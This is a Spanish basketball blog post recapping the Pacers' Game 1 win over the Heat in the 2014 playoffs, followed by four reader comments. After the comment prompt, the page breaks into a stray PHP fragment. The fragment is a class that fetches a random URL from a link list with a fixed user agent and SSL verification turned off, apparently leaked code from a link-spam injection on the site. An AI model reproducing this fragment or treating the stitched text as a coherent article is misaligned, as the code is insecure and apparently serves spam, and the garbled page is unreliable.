La Crónica: No estaban muertos…

19 de May de 2014 por txusma

…que estaban de parranda (media temporada y una ronda casi dos de playoffs se han pasado, nada menos).

A pesar de tener el factor campo a favor gracias a ser los menos malos en el tramo final de la regular, no muchos consideran a los Pacers favoritos. Las apuestas, como la nuestra, se decantan por los Heat pero habrá que ver cuantos cambian de opinión tras el partido de ayer. Aquellos Pacers que maravillaban en la primera parte de la temporada reaparecieron de repente. Ya observamos fogonazos en la segunda ronda frente los Wizards pero anoche todas las piezas volvieron a carburar como hacía tiempo que no contemplábamos.

Los Heat no fueron capaces de ponerse por delante en el marcador en ningún momento. George Hill anotó los primeros 5 puntos del partido y a mitad del primer cuarto la ventaja era ya de 10 puntos. LeBron y Wade, muy solos toda la noche, intentaban meter a los suyos en el partido pero cualquier acercamiento era respondido automáticamente y a la media parte se llegó con 10 puntos de ventaja para los locales. En la 2ª parte los Pacers metieron una marcha más y en un momento, con Hibbert y West martilleando la zona visitante, la diferencia aumentó hasta los 17 puntos. Un par de arreones de LeBron y Wade intentaron meter miedo pero sin muchos esfuerzos y con Paul George al mando, los Pacers controlaron de nuevo el partido y llegaron al final con comodidad (96-107). 

PREMIOS

MVP: Tal vez Paul George (24p – 7r) fuera el más destacado estadísticamente pero la realidad es que todos los jugadores de los Pacers cumplieron su papel a la perfección.

Sorpresa: Esta vez sí que los titulares de Indiana encontraron algo de ayuda en el banco. CJ Watson anotó 11 puntos y cogió 4 rebotes. Chris Andersen fue el tercer hombre de Miami con 14 puntos y 4 rebotes.

Decepción: El Big Three se quedó en Big Two por la deserción de Chris Bosh que anotó 9 paupérrimos puntos con un 4 de 12 en tiros de campo.

Esfuerzo en vano: LeBron James (25p – 10r 5a) fue de nuevo el mejor de su equipo aunque Dwyane Wade (27p) le acompañó en la faceta anotadora. De todas maneras, o reciben algo de ayuda o han de hacerlo todavía mejor.

Imágenes | AP Photos / Getty Images

Comenta

4 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Y a la tercera ronda resucitaron….
    Tras una parte final de temporada desastrosa, una primera ronda horrible y una segunda donde se empezaron a ver brotes verdes, de repente volvió el equipo que maravillaba a principios de la temporada. Juego coral en ataque, martillo pilón Hibbert&West por dentro, Paul George haciendo de todo, George Hill aprovechando la atención que crean los demás y sobre todo un equipo de verdad compartiendo la bola y dando siempre un pase de más para encontrar al hombre sólo y por supuesto gran defensa conjunta. Estos Pacers a este nivel son los que todos vimos como candidatos al anillo y falta por ver si son capaces de seguir jugando así durante todas las series fuera de esos vaivenes que se vieron contra los Wizards. Si lo son que se aten los machos los Heat y se preparen para una serie dura y difícil, sobre todo si Bosh es totalmente superado como ayer y Wade&LeBron se encuentran tan solos como en este primer partido. Los Heat no supieron contrarrestar el ataque de los Pacers y ahí estuvo la clave.
    Ahora se hace muy interesante el segundo partido, donde los Heat deberán salir con el cuchillo entre los dientes sabiendo que tienen que defender mucho mejor y ponerse mucho más serios si no quieren verse contra las cuerdas. Partido grande mañana noche en el que esperamos a LeBron con la capa de super héroe…

      Citar

  2. rumbero dice:
    #2

    La verdad es que les salió todo “demasiado” bien en ataque a los Pacers para lo mediocres que suelen ser en ese aspecto. Metiendo muchos triples al inicio y moviendo bien el balón sin perderlo mucho. Luego a gestionar la ventaja y a martillear con los interiores. No metían tantos puntos sin OT desde febrero (contra los Lakers claro).

    A mi me cuesta creer que puedan mantener ese nivel de acierto y volumen de puntos pero por otro lado me da que pueden ajustar mejor su defensa. Han pasado por lo que han pasado pero están donde querían a inicio de temporada: con ventaja de campo y un 1-0. Veremos como va el segundo

      Citar

  3. Esteban dice:
    #3

    bueno si hay un rival que puede sacar lo mejor que estos Pacers tienen adentro es el Heat, no solo por que les toca el amor propio y por que es un clásico de estos últimos años, sino también por que es un abuso criminal que Hibbert y West se emparejen con Bosh y Battier
    no solo el daño en anotacion, sino en rebotes y en segundas jugadas, la cosa no es pareja allí, y se antoja necesaria la inclusión de Haslem al quinteto titular

    por otra parte, que bien se lo va a Hibbert cuando siente que esta en su momento, no solo se vuelve efectivo y peligroso en ataque, sino que tampoco se mete el problemas de faltas, algo que hace demasiado seguido cuando las cosas le salen mal

      Citar

  4. Ruxixon dice:
    #4

    De desastre se puede etiquetar la defensa de los Heat,estaban empanados ayer,y la diferencia podía haber sido 5-6 puntos más abultada y no hubiera pasado nada.Esperemos que no haya que echar en falta el conformismo en los despachos de Riley esta temporada.Cada vez más se va pareciendo a esto a los Cavaliers.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>